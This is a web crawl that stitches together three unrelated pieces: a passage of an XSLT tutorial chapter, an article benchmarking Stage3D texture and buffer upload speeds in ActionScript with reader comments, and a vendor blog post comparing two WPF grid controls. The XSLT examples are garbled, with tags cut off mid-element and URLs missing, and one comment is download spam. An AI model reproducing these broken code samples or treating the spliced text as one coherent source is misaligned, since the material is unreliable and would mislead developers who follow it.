I’ll start this chapter with an example to show how XSLT works. Using XSLT Style Sheets in XML Documents You use XSLT to manipulate documents, changing and working with their markup as you want. One of the most common transformations is from XML documents to HTML documents, and that’s the kind of transformation we’ll see in the examples in this chapter. To create an XSLT transformation, you need two documents—the document to transform, and the style sheet that specifies the transformation. Both documents are well-formed XML documents. Here’s an example; this document, planets.xml, is a well-formed XML document that holds data about three planets—Mercury, Venus, and Earth. Throughout this chapter, I’ll transform this document to HTML in various ways. For programs that can understand it, you can use the <?xml-stylesheet?> processing instruction to indicate what XSLT style sheet to use, where you set the type attribute to "text/xml" and the href attribute to the URI of the XSLT style sheet, such as planets.xsl in this example (XSLT style sheets usually have the extension .xsl). <?xml version="1.0"?> <?xml-stylesheet XSL Style Sheets Here’s what the style sheet planets.xsl might look like. In this case, I’m converting planets.xml into HTML, stripping out the names of the planets, and surrounding those names with HTML <P> elements: <?xml version="1.0"?> <xsl:stylesheet <xsl:template <HTML> <xsl:apply-templates/> </HTML> </xsl:template> <xsl:template <P> <xsl:value-of </P> </xsl:template> </xsl:stylesheet> All right, we have an XML document and the style sheet we’ll use to transform it. So, how exactly do you transform the document? Making a Transformation Happen You can transform documents in three ways: In the server. A server program, such as a Java servlet, can use a style sheet to transform a document automatically and serve it to the client. One such example is the XML Enabler, which is a servlet that you’ll find at the XML for Java Web site,. In the client. A client program, such as a browser, can perform the transformation, reading in the style sheet that you specify with the <?xml-stylesheet?> processing instruction. Internet Explorer can handle transformations this way to some extent. With a separate program. Several standalone programs, usually based on Java, will perform XSLT transformations. I’ll use these programs primarily in this chapter. In this chapter, I’ll use standalone programs to perform transformations because those programs offer by far the most complete implementations of XSLT. I’ll also take a look at using XSLT in Internet Explorer. Two popular programs will perform XSLT transformations: XT and XML for Java. James Clark’s XT You can get James Clark’s XT at. Besides XT itself, you’ll also need a SAX-compliant XML parser, such as the one we used in the previous chapter that comes with the XML for Java packages, or James Clark’s own XP parser, which you can get at xp/ index.html. XT is a Java application. Included in the XT download is the JAR file you’ll need, xt.jar. The XT download also comes with sax.jar, which holds James Clark’s SAX parser. You can also use the XML for Java parser with XT; to do that, you must include both xt.jar and xerces.jar in your CLASSPATH, something like this: %set CLASSPATH=%CLASSPATH%;C:\XML4J_3_0_1\xerces.jar;C:\xt\xt.jar; Then you can use the XT transformation class, com.jclark.xsl.sax.Driver. You supply the name of the SAX parser you want to use, such as the XML for Java class org.apache.xerces.parsers.SAXParser, by setting the com.jclark.xsl.sax.parser variable with the java -D switch. Here’s how I use XT to transform planets.xml, using planets.xsl, into planets.html: %java -Dcom.jclark.xsl.sax.parser= org.apache.xerces.parsers.SAXParser com.jclark.xsl.sax.Driver planets.xml planets.xsl planets.html XT is also packaged as a Win32 exe. To use xt.exe, however, you will need the Microsoft Java Virtual Machine (VM) installed (included with Internet Explorer). Here’s an example in Windows that performs the same transformation as the previous command: C:\>xt planets.xml planets.xsl planets.html XML for Java You can also use the IBM alphaWorks XML for Java XSLT package, called LotusXSL. LotusXSL implements an XSLT processor in Java that can be used from the command line, in an applet or a servlet, or as a module in another program. By default, it uses the XML4J XML parser, but it can interface to any XML parser that conforms to the either the DOM or the SAX specification. Here’s what the XML for Java site says about LotusXSL: "LotusXSL 1.0.1 is a complete and a robust reference implementation of the W3C Recommendations for XSL Transformations (XSLT) and the XML Path Language (XPath)." You can get LotusXSL at; just click the XML item in the frame at left, click LotusXSL, and then click the Download button (or you can go directly to, although that URL may change). The download includes xerces.jar, which includes the parsers that the rest of the LotusXSL package uses (although you can use other parsers), and xalan.jar, which is the LotusXSL JAR file. To use LotusXSL, make sure that you have xalan.jar in your CLASSPATH; to use the XML for Java SAX parser, make sure that you also have xerces.jar in your CLASSPATH, something like this: %set CLASSPATH= %CLASSPATH%;C:\lotusxsl_1_0_1\xalan.jar;C:\xsl\lotusxsl_1_0_1\xerces.jar; Unfortunately, the LotusXSL package does not have a built-in class that will take a document name, a style sheet name, and an output file name like XT. However, I’ll create one named xslt, and you can use this class quite generally for transformations. Here’s what xslt.java looks like: import org.apache.xalan.xslt.*; public class xslt { public static void main(String[] args) { try { XSLTProcessor processor = XSLTProcessorFactory.getProcessor(); processor.process(new XSLTInputSource(args[0]), new XSLTInputSource(args[1]), new XSLTResultTarget(args[2])); } catch (Exception e) { System.err.println(e.getMessage()); } } } After you’ve set the CLASSPATH as indicated, you can create xslt.class with javac like this: %javac xslt.java The file xslt.class is all you need. After you’ve set the CLASSPATH as indicated, you can use xslt.class like this to transform planets.xml, using the style sheet planets.xsl, into planets.html: %java xslt planets.xml planets.xsl planets.html What does planets.html look like? In this case, I’ve set up planets.xsl to simply place the names of the planets in <P> HTML elements. Here are the results, in planets.html: <HTML> <P>Mercury</P> <P>Venus</P> <P>Earth</P> </HTML> That’s the kind of transformation we’ll see in this chapter. There’s another way to transform XML documents without a standalone program—you can use a client program such as a browser to transform documents. Using Browsers to Transform XML Documents Internet Explorer includes a partial implementation of XSLT; you can read about Internet Explorer support at. That support is based on the W3C XSL working draft of December 16, 1998 (which you can find at); as you can imagine, things have changed considerably since then. To use planets.xml with Internet Explorer, I have to make a few modifications. For example, I have to convert the type attribute in the <?xml-stylesheet?> processing instruction from "text/xml" to "text/xsl": <?xml version="1.0"?> <?xml-stylesheet I can also convert the style sheet planets.xsl for use in Internet Explorer. A major difference between the W3C XSL recommendation and the XSL implementation in Internet Explorer is that Internet Explorer doesn’t implement any default XSL rules (which I’ll discuss in this chapter). This means that I have to explicitly include an XSL rule for the root of the document, which you specify with /. I also have to use a different namespace in the style sheet,, and omit the version attribute in the <xsl:stylesheet> element: <?xml version="1.0"?> <xsl:stylesheet xmlns: <xsl:template <HTML> <xsl:apply-templates/> </HTML> </xsl:template> <xsl:template <xsl:apply-templates/> </xsl:template> <xsl:template <P> <xsl:value-of </P> </xsl:template> </xsl:stylesheet> You can see the results of this transformation in Figure 13.1. Figure 13.1 Performing an XSL transformation in Internet Explorer. We now have an overview of XSL transformations and have seen them at work. It’s time to see how to create XSLT style sheets in detail.
http://www.peachpit.com/articles/article.aspx?p=133615&amp;seqNum=11
CC-MAIN-2017-26
refinedweb
1,676
66.54
Stage3D Upload Speed Tester Since Flash Player 11’s. The below performance test checks the upload speeds in both hardware and software mode of all of these types: Texturefrom… - BitmapData - Vector - ByteArray VertexBuffer3Dfrom… - Vector - ByteArray IndexBuffer3Dfrom… - Vector - ByteArray Check it out: package { import flash.display3D.*; import flash.display3D.textures.*; import flash.external.*; import flash.display.*; import flash.sampler.*; import flash.system.*; import flash.events.*; import flash.utils.*; import flash.text.*; import flash.geom.*; import com.adobe.utils.*; public class Stage3DUploadTester extends Sprite { private var __stage3D:Stage3D; private var __logger:TextField = new TextField(); private var __context:Context3D; private var __driverInfo:String; private var __texture:Texture; private var __bmdNoAlpha:BitmapData; private var __bmdAlpha:BitmapData; private var __texBytes:ByteArray; private var __vertexBuffer:VertexBuffer3D; private var __vbVector:Vector.<Number>; private var __vbBytes:ByteArray; private var __indexBuffer:IndexBuffer3D; private var __ibVector:Vector.<uint>; private var __ibBytes:ByteArray; public function Stage3DUploadTester() { __stage3D = stage.stage3Ds[0]; __logger.autoSize = TextFieldAutoSize.LEFT; addChild(__logger); // Allocate texture data __bmdNoAlpha = new BitmapData(2048, 2048, false, 0xffffffff); __bmdAlpha = new BitmapData(2048, 2048, true, 0xffffffff); __texBytes = new ByteArray(); var size:int = __texBytes.length = 2048*2048*4; for (var i:int; i < size; ++i) { __texBytes[i] = 0xffffffff; } // Allocate vertex buffer data size = 65535*64; __vbVector = new Vector.<Number>(size); for (i = 0; i < size; ++i) { __vbVector[i] = 1.0; } __vbBytes = new ByteArray(); __vbBytes.length = size*4; for (i = 0; i < size; ++i) { __vbBytes.writeFloat(1.0); } __vbBytes.position = 0; // Allocate index buffer data size = 524287; __ibVector = new Vector.<uint>(size); for (i = 0; i < size; ++i) { __ibVector[i] = 1.0; } __ibBytes = new ByteArray(); __ibBytes.length = size*4; for (i = 0; i < size; ++i) { __ibBytes.writeFloat(1.0); } __ibBytes.position = 0; setupContext(Context3DRenderMode.AUTO); } private function setupContext(renderMode:String): void { __stage3D.addEventListener(Event.CONTEXT3D_CREATE, onContextCreated); __stage3D.requestContext3D(renderMode); } private function onContextCreated(ev:Event): void { __stage3D.removeEventListener(Event.CONTEXT3D_CREATE, onContextCreated); var first:Boolean = __logger.text.length == 0; if (first) { __logger.appendText("Driver,Test,Time,Bytes/Sec\n"); } const width:int = stage.stageWidth; const height:int = stage.stageHeight; __context = __stage3D.context3D; __context.configureBackBuffer(width, height, 0, true); __driverInfo = __context.driverInfo; __texture = __context.createTexture( 2048, 2048, Context3DTextureFormat.BGRA, false ); __vertexBuffer = __context.createVertexBuffer(65535, 64); __indexBuffer = __context.createIndexBuffer(524287); runTests(); if (first) { __context.dispose(); setupContext(Context3DRenderMode.SOFTWARE); } } private function runTests(): void { var beforeTime:int; var afterTime:int; var time:int; beforeTime = getTimer(); __texture.uploadFromBitmapData(__bmdNoAlpha); afterTime = getTimer(); time = afterTime - beforeTime; row("Texture from BitmapData w/o alpha", time, 2048*2048*4); beforeTime = getTimer(); __texture.uploadFromBitmapData(__bmdAlpha); afterTime = getTimer(); time = afterTime - beforeTime; row("Texture from BitmapData w/ alpha", time, 2048*2048*4); beforeTime = getTimer(); __texture.uploadFromByteArray(__texBytes, 0); afterTime = getTimer(); time = afterTime - beforeTime; row("Texture from ByteArray", time, 2048*2048*4); beforeTime = getTimer(); __vertexBuffer.uploadFromVector(__vbVector, 0, 65535); afterTime = getTimer(); time = afterTime - beforeTime; row("VertexBuffer from Vector", time, 65535*64*4); beforeTime = getTimer(); __vertexBuffer.uploadFromByteArray(__vbBytes, 0, 0, 65535); afterTime = getTimer(); time = afterTime - beforeTime; row("VertexBuffer from ByteArray", time, 65535*64*4); beforeTime = getTimer(); __indexBuffer.uploadFromVector(__ibVector, 0, 524287); afterTime = getTimer(); time = afterTime - beforeTime; row("IndexBuffer from Vector", time, 524287*4); beforeTime = getTimer(); __indexBuffer.uploadFromByteArray(__ibBytes, 0, 0, 524287); afterTime = getTimer(); time = afterTime - beforeTime; row("IndexBuffer from ByteArray", time, 524287*4); } private function row(name:String, time:int, bytes:int): void { __logger.appendText( __driverInfo + "," + name + "," + time + "," + (bytes/time).toFixed(2) + "\n" ); } } } I ran this performance test with the following environment: - Flex SDK (MXMLC) 4.5.1.21328, compiling in release mode (no debugging or verbose stack traces) - Release version of Flash Player 11.0.1.152 - 2.4 Ghz Intel Core i5 - Mac OS X 10.7.2 And got these results: There is a clear order of speed in all tests, regardless of hardware or software or type of GPU resource being uploaded to: ByteArray(fastest) Vector BitmapData(slowest) Only the magnitude of the advantage changes with this. In particular, if you can manage to upload a vertex or index buffer from a ByteArray, you’re assured a huge performance win. Uploading texture data seems much faster in software compared to hardware: a 3x improvement. As for vertex and index buffers, it’s more of a mixed bag. Software is faster when uploading vertex buffers from a Vector, hardware is faster when uploading index buffers from a ByteArray, and the rest are a tie. Vertex buffers are curiously quicker to upload than index buffers. The difference is more dramatic with software rendering (3x faster) than hardware rendering (50% faster). More so than ever before in my performance articles is it important to keep in mind that the performance results posted above are valid only for the test environment that produced them. These numbers may change on Windows, which uses DirectX instead of OpenGL, or any of a number of mobile handsets using OpenGL ES. Spot a bug? Have a suggestion? Different results on your environment? Post a comment! #1 by Smily on October 31st, 2011 · | Quote My results for the following config: Flash Player 11.0.1.152 Firefox 7.0.1 Windows 7 Intel Core 2 Quad Q6600 GeForce 560ti Driver,Test,Time,Bytes/Sec DirectX9 (Direct blitting),Texture from BitmapData w/o alpha,22,762600.73 DirectX9 (Direct blitting),Texture from BitmapData w/ alpha,11,1525201.45 DirectX9 (Direct blitting),Texture from ByteArray,11,1525201.45 DirectX9 (Direct blitting),VertexBuffer from Vector,22,762589.09 DirectX9 (Direct blitting),VertexBuffer from ByteArray,11,1525178.18 DirectX9 (Direct blitting),IndexBuffer from Vector,2,1048574.00 DirectX9 (Direct blitting),IndexBuffer from ByteArray,2,1048574.00 Software (Direct blitting),Texture from BitmapData w/o alpha,21,798915.05 Software (Direct blitting),Texture from BitmapData w/ alpha,12,1398101.33 Software (Direct blitting),Texture from ByteArray,11,1525201.45 Software (Direct blitting),VertexBuffer from Vector,22,762589.09 Software (Direct blitting),VertexBuffer from ByteArray,11,1525178.18 Software (Direct blitting),IndexBuffer from Vector,2,1048574.00 Software (Direct blitting),IndexBuffer from ByteArray,2,1048574.00 Note that the numbers vary quite a bit from test to test, with “DirectX9 (Direct blitting),Texture from BitmapData w/o alpha” running as fast as 15ms and as slow as 28ms. #2 by Tronster on October 31st, 2011 · | Quote One other curiosity to note is that uploading texture data seems much faster in hardware compared to software. I may be reading this wrong, but doesn’t your graph show the opposite of this? Looks like all three types of software uploading can push more bytes/sec than hardware. #3 by jackson on October 31st, 2011 · | Quote The graphs are showing bytes-per-second, so you want a higher bar as opposed to most of my articles that are showing time, so you want a lower bar. Sorry for the confusion. #4 by skyboy on October 31st, 2011 · | Quote On your system, software is faster; vs. where you said hardware is faster in the article. #5 by jackson on October 31st, 2011 · | Quote Ah, I see now. I’ve updated the article to have more accurate conclusions on the rendering mode: harware vs. software. #6 by James on November 2nd, 2011 · | Quote My result somehow all the same? Infinity mean what? The Laptop is Lenovo Y460 Driver,Test,Time,Bytes/Sec DirectX9 (Direct blitting),Texture from BitmapData w/o alpha,10,1677721.60 DirectX9 (Direct blitting),Texture from BitmapData w/ alpha,10,1677721.60 DirectX9 (Direct blitting),Texture from ByteArray,0,Infinity DirectX9 (Direct blitting),VertexBuffer from Vector,10,1677696.00 DirectX9 (Direct blitting),VertexBuffer from ByteArray,10,1677696.00 DirectX9 (Direct blitting),IndexBuffer from Vector,0,Infinity DirectX9 (Direct blitting),IndexBuffer from ByteArray,0,Infinity Software (Direct blitting),Texture from BitmapData w/o alpha,10,1677721.60 Software (Direct blitting),Texture from BitmapData w/ alpha,0,Infinity Software (Direct blitting),Texture from ByteArray,10,1677721.60 Software (Direct blitting),VertexBuffer from Vector,10,1677696.00 Software (Direct blitting),VertexBuffer from ByteArray,10,1677696.00 Software (Direct blitting),IndexBuffer from Vector,0,Infinity Software (Direct blitting),IndexBuffer from ByteArray,0,Infinity #7 by skyboy on November 8th, 2011 · | Quote Heh. Infinity is due to X/0 in AS3 resulting in Infinity instead of NaN; though 0/0 is still NaN. #8 by Jacob on November 19th, 2011 · | Quote Here are results from my machine: Driver,Test,Time,Bytes/Sec OpenGL Vendor=ATI Technologies Inc. Version=2.1 ATI-1.6.38 Renderer=ATI Radeon HD 6490M OpenGL Engine GLSL=1.20 (Direct blitting),Texture from BitmapData w/o alpha,16,1048576.00 OpenGL …Texture from BitmapData w/ alpha,16,1048576.00 OpenGL …Texture from ByteArray,16,1048576.00 OpenGL …VertexBuffer from Vector,36,466026.67 OpenGL …VertexBuffer from ByteArray,2,8388480.00 OpenGL …IndexBuffer from Vector,3,699049.33 OpenGL …IndexBuffer from ByteArray,1,2097148.00 Software (Direct blitting),Texture from BitmapData w/o alpha,9,1864135.11 Software (Direct blitting),Texture from BitmapData w/ alpha,3,5592405.33 Software (Direct blitting),Texture from ByteArray,3,5592405.33 Software (Direct blitting),VertexBuffer from Vector,13,1290535.38 Software (Direct blitting),VertexBuffer from ByteArray,3,5592320.00 Software (Direct blitting),IndexBuffer from Vector,2,1048574.00 Software (Direct blitting),IndexBuffer from ByteArray,1,2097148.00 #9 by David on November 21st, 2011 · | Quote nvidia gtx560 i7 2600k Driver,Test,Time,Bytes/Sec DirectX9 (Direct blitting),Texture from BitmapData w/o alpha,4,4194304.00 DirectX9 (Direct blitting),Texture from BitmapData w/ alpha,2,8388608.00 DirectX9 (Direct blitting),Texture from ByteArray,3,5592405.33 DirectX9 (Direct blitting),VertexBuffer from Vector,6,2796160.00 DirectX9 (Direct blitting),VertexBuffer from ByteArray,3,5592320.00 DirectX9 (Direct blitting),IndexBuffer from Vector,1,2097148.00 DirectX9 (Direct blitting),IndexBuffer from ByteArray,1,2097148.00 Software (Direct blitting),Texture from BitmapData w/o alpha,4,4194304.00 Software (Direct blitting),Texture from BitmapData w/ alpha,3,5592405.33 Software (Direct blitting),Texture from ByteArray,2,8388608.00 Software (Direct blitting),VertexBuffer from Vector,5,3355392.00 Software (Direct blitting),VertexBuffer from ByteArray,3,5592320.00 Software (Direct blitting),IndexBuffer from Vector,1,2097148.00 Software (Direct blitting),IndexBuffer from ByteArray,1,2097148.00 i really don’t understand, why the bitmapdata would upload slower without the alpha-channel. does the gpu need the alpha-channel and therefor all rgb-pixels get converted to rgba or where is this coming from? btw, jackson. it would be nice, if you could create some sort of best-practise article for the new 3dapi, based on your performance-research. all the years of performance-optimizing in flash, and now this new technology, and im constantly struggling with fps-drops in my experiments, and i just dont know where they come from, and the tutorials on the web are quite thin and i dont really trust the adobe-tutorials. they posted so many bad/slow examples in the past, i dont think it’s so much better this time ;) thanks for your great efforts. #10 by jackson on November 21st, 2011 · | Quote Your guess is as good as mine about the alpha channel upload. That does seem plausible though. Thanks for the idea about a “best practices” article for Stage3D. I’ve been writing a lot on the subject recently so that may very well happen. :) #11 by Sam on February 5th, 2012 · | Quote Hi Jackson, the indexbuffer code needs a correction: You should use writeShort() instead of writeFload() and the size should be size*2 instead of size*4 because each index is only 16bits wide. #12 by Matt Lockyer on March 21st, 2012 · | Quote Hey Jackson, Wondering if you could revisit this. I’ve tested some vectors and byte arrays, and I’m wondering what the cost of updating the bytearray would be if that is incorporated into the test? Roughly I’m showing average framerates of 32-33 for vectors compared to 29-30 for bytearrays… I think this might be due to the fact that you must update the bytearray and this access is slower? Is a ba.writeFloat(…) slower than data[x] = y ??? #13 by jackson on March 21st, 2012 · | Quote Hey Matt, If I’m understanding correctly, you’d like a test of Vectoraccess as opposed to multiple forms of ByteArrayaccess. If so, this sounds like a great idea for an article and one I can’t believe I haven’t written yet! I’ll definitely add it to my list of articles to write. Thanks for the tip, -Jackson #14 by Matt Lockyer on March 21st, 2012 · | Quote Yes that’s correct! Thank you for taking the time to follow up. The basic premise behind why this would be an interesting article to write rests in the need for us (as3 developers) to constantly update many values per object per frame into a single vector or bytearray for uploading to the vertex buffer. Thanks again! #15 by Glidias on January 24th, 2013 · | Quote I have a bit of a delimma. I know ByteArray uploads to Stage3D are faster. Unfortunately, in order to write a series of floats to ByteArray at randomly accessed positions, I have to constantly set the ByteArray.position pointer, and than call writeFloat(). I’m not sure if indexed access is possible here since i’m not writing bytes, but a full float. So, I fear that doing this in the CPU pre-processing step would take up more resources compared to simply updating values in a dense int fixed-size vector, which should be much faster and easier to read code-wise. I guess I can get around this ByteArray problem by using some Domain memory API to handle this stuff, since my application could allocate a fixed ByteArray that I can use specifically for things like vertex data uploads, on-the-fly geometry collision detection, calculations, etc. The stupid thing about Flash is that Domain Memory isn’t available upfront unless I use something like Haxe or Apparat, and I’d also need to register for a license. Anyway, I’m doing such bytearray uploads per-frame anyway, but occasionally for various pooled terrain lod chunks in a quad-tree which are no longer cached (ie. their vertex data was invalidated by other used chunks). So, it doesn’t happen too often across many frames. Thus, no need to pre-maturely optimize things. Maybe you can provide a benchmark for this. (randomly accessed positions and writing floats to ByteArray, then upload, compare to doing it for Vectors). Maybe even do an indexed access for byteArray (ie. no using writeFloat() method), but you’d need to write into 4 byte indices manually to compose into a float, and I’m not too sure how to do that… #16 by jackson on January 24th, 2013 · | Quote I haven’t done such a test, but it’s intriguing. This is actually a common problem when using Stage3Dwith AS3, particularly when you’re trying to avoid the conversion from Numberto 32-bit floating point values in uploading vertex buffers and constants. You can avoid it by writing out 32-bit floats to a ByteArrayand then uploading that, which really helps CPU usage. In your situation it seems like the ByteArrayversion may be quicker, especially if you’re willing to go the licensed route with domain memory. Of course there’s only one way to find out. I’ll see about putting together a head-to-head performance test. #17 by Glidias on February 7th, 2013 · | Quote Well, domain memory is no longer categorised as Premium Features. So, i think domain memory should be the best approach to avoid costly Bytearray manipulation prior to uploading via Bytearray. You only need to manage your offsets/ranges though, since most domain memory implementations use 1 bytearray, so this should be easy to handle with various HAxe libs or Apparat memory managers. #18 by Xavi Colomer on April 23rd, 2013 · | Quote Hi There, I’m having some problems uploading 196000 vertex. It takes up to 15-20 seconds to upload it to the context. Is that normal? vector is a Vector. buffer.elements = Engine.context.createVertexBuffer(size, buffer.itemSize); buffer.elements.uploadFromVector(vector, 0, size ); I did also have added this questions in SO and Adobe: Thanks! #19 by jackson on April 23rd, 2013 · | Quote No, that’s not normal. In the test from this article I upload 64k vertices in under 50 milliseconds. It’s not that I’m doing anything tricky, that’s just how long it took in the test environment using the normal uploading strategy. Are you using a super slow computer? Are you inadvertently including way more in your time measurement? What are your results using the “Try” link from the article on the same computer that takes 15-20 seconds? #20 by Xavi Colomer on April 24th, 2013 · | Quote Hi Jackson, Thank you for your reply. It’s difficult to say how much time it takes because the flash player appears to be stopped during 15-20 during the upload. I am porting a customised threejs engine to flash as a fallback for old browsers. Little scenes works great but complex ones increments their rendering time exponentially. We just found a couple of bugs on the JS side, but I definitely have to improve the flash side. Ill tell you something once we fix the JS bug, which is increasing the data unnecessarily. Thanks! #21 by Xavi Colomer on April 24th, 2013 · | Quote Hi jackson, We found what the problem is. Apparently the problem is ExternalInterface. Has problems sending 200000 vertices. #22 by Zwick on May 2nd, 2013 · | Quote My results on 5 years old XPS M1530 with M8600GT. Driver,Test,Time,Bytes/Sec OpenGL,Texture from BitmapData w/o alpha,51,328965.02 OpenGL,Texture from BitmapData w/ alpha,39,430185.03 OpenGL,Texture from ByteArray,39,430185.03 OpenGL,VertexBuffer from Vector,32,524280.00 OpenGL,VertexBuffer from ByteArray,24,699040.00 OpenGL,IndexBuffer from Vector,14,149796.29 OpenGL,IndexBuffer from ByteArray,2,1048574.00 Software Hw_disabled=explicit,Texture from BitmapData w/o alpha,16,1048576.00 Software Hw_disabled=explicit,Texture from BitmapData w/ alpha,11,1525201.45 Software Hw_disabled=explicit,Texture from ByteArray,16,1048576.00 Software Hw_disabled=explicit,VertexBuffer from Vector,43,390161.86 Software Hw_disabled=explicit,VertexBuffer from ByteArray,16,1048560.00 Software Hw_disabled=explicit,IndexBuffer from Vector,3,699049.33 Software Hw_disabled=explicit,IndexBuffer from ByteArray,2,1048574.00 #23 by dayz free download on June 16th, 2014 · | Quote Via notre site web, vous avez la possibilité de télécharger Minecraft 1.7.9 gratuitement. C’est la version du jour que l’on vous propose. Vous pourrez télécharger à haute vitesse via notre lien. #24 by NickyD on June 26th, 2014 · | Quote I know this article is old, but I have been working with batched geometry and ran into a little problem; hoping you can shed some light on the matter. Adobe Scout reports that uploadFromVector() seems to take longer and longer to finish executing over the course of time when the number of objects to be batched is lower than the maximum number of batched objects allowed in the space from the VBO. When numVerts != BATCH_VERTEX_MAX is when I notice the strange inconsistencies in performance. CODE mBatchedVertexBuffer.uploadFromVector(mVertexBufferData, 0, numVerts); CODE
https://jacksondunstan.com/articles/1617?replytocom=15207
CC-MAIN-2019-51
refinedweb
3,182
50.33
Web pages have traditionally relied on hyperlinks to associate text with related information residing on file systems, Web servers, or Usenet News. With the introduction of smart tags in Microsoft Office XP, you can enhance this type of hyperlinking behavior by associating text with not only multiple resources but also information provided by custom applications as well. Smart tags provide users with the ability to associate text and data with actions. For example, if you type the stock ticker symbol INTM into a Word 2002 document or an Excel 2002 spreadsheet, and smart tags are enabled, a list of actions will appear, such as viewing a stock quote, company report, or recent news from a financial information Web site. Office XP provides several smart tags in the box, but you can develop your own smart tags as well. For example, you can develop smart tags that automate lookups, for instance street addresses in a mapping service, or city names with local weather information. While some people see great potential in the external linking of resources, others see it as yet another try by Microsoft to dominate the Internet by allowing the browser to control links on arbitrary Web pages. Not surprisingly most of the Smart Tag destination sites are somewhere in the Microsoft Network. This way Microsoft integrates their content even in places where the user might not want it. Also it is not acceptable that the browser changes the original document by adding links to it. In some countries such as Germany that might make Microsoft legally responsible for the content of the page. Looking at the current beta of Internet Explorer 6 shows how useless this feature is in practice, though: A page talking about everybody's darling, the IRS, offers links to their alleged stock quote, which of course refers to a completely unrelated real estate company. One would assume that without more meta-data in the HTML (using XML, anybody?) it would be as difficult to come up with good guesses as it currently is for search engines. If the above did not put you off, the following paragraphs show you how to make your Web pages smart-tag aware. To add smart tags to Web pages, you can use a text or HTML editor. To view smart tags, users must have the following software installed on their computers: Office XP, Microsoft Internet Explorer 5 or later, and the appropriate smart tag dynamic link library (DLL) or smart tag Extensible Markup Language (XML) list description file. To add smart tags to Web pages, you must first declare the Office namespace URI inside the Web page, and then you declare one or more smart tag namespace URIs in the Web page's HTML element. <html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:myns="" You can declare as many user-defined namespace URIs as you want in a document to uniquely qualify as many aliases as you need. However, any namespace URIs other than urn:schemas-microsoft-com:office:office must match exactly one of the namespace URIs contained in a smart tag action DLL , or smart tag XML list description file installed and registered on the user's computer. For example, if one of the smart tag types is declared as in the ISmartTagAction_SmartTagName property of your smart tag action DLL , or as the value of the type attribute for the smarttag element in your smart tag XML list description file, then you should declare your namespace URI in your Web page as the characters preceding the # symbol, such as. At run time, Office XP tries to match this namespace URI with one in all of the smart tag DLLs and smart tag XML list description files on a user's computer to resolve smart tag actions. If no match is found, then the smart tag actions associated with that smart tag type will not be invoked. Let's look at declaring and using smart tags. Produced by Michael Claßen Created: Aug 29, 2001 Revised: Aug 29, 2001
http://www.webreference.com/xml/column38/
crawl-002
refinedweb
673
53.44
Log in to like this post! XamDataGrid vs XamGrid: Which WPF Grid Should I Choose? Brian Lagunas / Thursday, January 18, 2018 Which WPF grid should I choose; the xamDataGrid or the xamGrid? If you use the Infragistics Ultimate UI for WPF product then you have asked yourself this question many times without a clear answer. Well, I’m going to make the answer crystal clear for you. Use the xamDataGrid! There, that was easy. Now that you have your answer, feel free to continue browsing the Infragistics blog for great content. If you want more information about why, and what our plans are for the xamGrid, then keep reading. But Why? The xamGrid was the product of a need to have a cross-platform grid that allows you to share code across WPF and Silverlight. While the Infragistics Ultimate UI for WPF product has always had the xamDataGrid, it was not possible to port this grid over to Silverlight because it was built to take advantage of WPF specific APIs to squeeze every little ounce of performance we could get. Hence, the cross-platform xamGrid was born. Along with it was a few editors as well which were called inputs: xamComboEditor - yes that's an input xamCurrencyInput xamDateTimeInput xamMaskedInput xamNumericInput Back in the Silverlight days, the decision to use which grid should have been clear. Use the xamGrid and inputs if trying to write a cross-platform WPF and SL app. If you’re writing a WPF only app, then use the xamDataGrid. Simple right? Well, not really. Back in those days, the messaging from us about which control to use was not clear. We failed at conveying the clear and concise message about which grid was the right grid for the app. Now, it’s just one heck of a confusing product for developers trying to decide which control set to use. The Infragistics Ultimate UI for WPF now has two grids, two date/time editors, two masked editors, two numeric editors, and so on. This can make it hard to choose which controls to use in your WPF app. To make a long story short, Silverlight is dead and so is any reason to use the xamGrid or it’s associated input controls. Feature Disparity While the feature parity between the xamGrid and xamDataGrid is close to 90%, there are three major features that are missing from the xamDataGrid that the xamGrid has. These features are: Cell Merging Conditional Formatting Paging I know what you’re thinking; “but Brian, I use those features. I can’t use the xamDataGrid unless it has them.” Well, I have good news. Cell Merging is being added to the xamDataGrid as I write this blog and will be available in the next Infragistics Ultimate UI for WPF 18.1 release. Conditional Formatting is scheduled for release in the Infragistics Ultimate UI for WPF 18.2 release. Paging on the other hand… well, I’m not sure if we’ll implement paging just yet. As a developer in the enterprise world, paging never made sense to me. With the addition of the xamDataGrid’s new async data sources in which you can asynchronously load data as you scroll from a service of your choosing and just have the values fade in, I see no real use case for paging. If paging is a must-have for your app, please let me know. I would love to have a conversation about that. What’s the Plan? Let’s address the elephant in the room. What’s the plan with the xamGrid and its associated inputs? Honestly, if I had complete control of the universe I would get rid of them all. I would mark the xamGrid and its inputs obsolete and have everyone move to the xamDataGrid and the WPF specific editors. Unfortunately, I can't do that. I know there are tons of customers using these controls in their apps, and the time and effort to change their code to use a different grid and/or editor is not a trivial task. So what is Infragistics going to do? We are going to make the message loud and clear about which controls you should be using. You may have already noticed some small indications of this direction. Ever since the death of Silverlight, there has been no new feature work on the xamGrid. Only critical bug fixes. The xamGrid and its inputs have been removed from the Visual Studio toolbox. They have been removed from the Infragistics Ultimate UI for WPF Sample Browser. They have been removed from the Infragistics Ultimate UI for WPF product webpage. Basically, the only way you are even using them is if you added them to your application two years ago, or if you manually added a reference to them. We are also going to officially stop all new feature work on the xamGrid and the associated inputs. This really is nothing new, but it's an official statement now. We will be updating the documentation to add a nice little "recommendation" at the top of each xamGrid and input topic so that you are constantly reminded that we want you using the xamDataGrid and WPF specific editors. We will continue to provide support and fix any critical bugs that are reported. The controls and their assemblies aren't going anywhere. I want you to leave the xamGrid; the xamGrid is not leaving you. Next Steps Once again, I’m not going to start removing stuff and breaking everyone. This will be a very long process (multiple years) and will give everyone plenty of time to make the move. I also understand that this may be frustrating for a lot of people using the xamGrid and have a lot of time and code invested in it. As a fellow developer, I completely understand the position you are in and I sincerely empathize with you. However, I cannot sit by and let you continue to use a control that we have no intention of moving forward. That would not be fair to you, your customers, or the company you work for. Our investments are in the xamDataGrid. That is the grid we are moving forward. Every release there is a new feature, improvement, or productivity tool to support it (just wait until you see the upcoming xamDataGrid control configurator). That is where I want you to be. If you use the xamGrid and are freaking out about this blog post, please contact me. I want to put together a guide to help you migrate your code over to the xamDataGrid. I need to know what features you are using. How you are extending the grid or customizing it. I want to know if there is anything blocking you from moving to the xamDataGrid (for example; paging). Summary To be clear, we haven’t marked anything deprecated and we aren't removing any controls or assemblies from the product. The xamGrid and its inputs will live on. They will just be in a zombie-like state. If an arm falls off, we'll put it back on. We just aren't feeding it brains anymore. I just want to clean up the product of duplicate controls in different namespaces and make it clear which controls you should be using. While you are more than welcome to continue to use the 